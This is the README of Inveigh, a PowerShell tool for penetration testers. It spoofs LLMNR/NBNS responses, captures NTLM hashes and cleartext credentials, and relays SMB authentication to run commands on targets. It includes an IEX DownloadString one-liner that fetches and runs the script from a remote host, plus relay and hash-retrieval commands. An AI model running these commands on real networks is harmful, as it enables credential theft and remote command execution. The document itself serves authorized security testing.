Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.
Tested minimums are PowerShell 2.0 and .NET 3.5
- Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture.
- LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
- SMB challenge/response captures are performed by sniffing over the host system's SMB service.
- HTTP challenge/response captures are performed with a dedicated listener.
- The local LLMNR/NBNS services do not need to be disabled on the host system.
- LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
- Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
- Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system.
- If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
- SMB relay support is experimental at this point, use caution if employing on a pen test.
Obtain an elevated administrator or SYSTEM shell and use a method to load the module
To import with Import-Module:
Import-Module ./Inveigh.psd1
To import using dot source method:
. ./Inveigh.ps1
. ./Inveigh-Relay.ps1
To load into memory using Invoke-Expression:
IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
To execute with default settings:
Invoke-Inveigh
To load and execute with one line:
Import-Module ./Inveigh.ps1;Invoke-Inveigh
To execute with features enabled/disabled:
Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path'
To execute with SMB relay enabled through Invoke-Inveigh:
Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
To execute with SMB relay with only Invoke-InveighRelay:
Invoke-InveighRelay -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters
Invoke-Inveigh - Start Inveigh with or without parameters
Invoke-InveighRelay - SMB relay function
Get-Inveigh - Get queued console output
Get-InveighCleartext - Get all captured cleartext credentials
Get-InveighLog - Get log entries
Get-InveighNTLM - Get all captured challenge/response hashes
Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes
Get-InveighNTLMv2 - Get captured NTLMv2 challenge/response hashes
Get-InveighStats - Get captured challenge/response counts
Watch-Inveigh - Enable real time console output
Clear-Inveigh - Clear Inveigh data from memory
Stop-Inveigh - Stop all running Inveigh functions
PowerShell Empire - https://github.com/PowerShellEmpire/Empire
PS>Attack - https://github.com/jaredhaight/psattack
Anyone that posted .net packet sniffing examples.
Responder - https://github.com/SpiderLabs/Responder
Impacket - https://github.com/CoreSecurity/impacket
Invoke-Inveigh execution with real time console and file output enabled
Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2
HTTP to SMB Relay
Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive PowerShell Session payloads
